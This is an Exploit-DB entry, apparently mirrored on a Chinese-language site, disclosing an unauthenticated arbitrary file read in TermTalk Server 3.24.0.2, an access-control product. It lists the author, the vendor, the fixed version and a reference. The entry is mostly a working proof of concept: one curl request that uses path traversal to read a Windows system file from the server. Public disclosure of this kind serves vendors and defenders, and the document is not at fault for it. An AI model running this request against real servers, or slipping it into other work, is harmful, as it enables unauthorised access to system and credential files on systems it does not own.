TermTalk Server 3.24.0.2 – Arbitrary File Read (Unauthenticated)

  • 作者: Fabiano Golluscio
    日期: 2022-01-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50638/
  • # Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
    # Date: 03/01/2022
    # Exploit Author: Fabiano Golluscio @ Swascan
    # Vendor Homepage: https://www.solari.it/it/
    # Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
    # Version: 3.24.0.2
    # Fixed Version: 3.26.1.7
    # Reference: https://www.swascan.com/solari-di-udine/
    
    POC
    
    curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts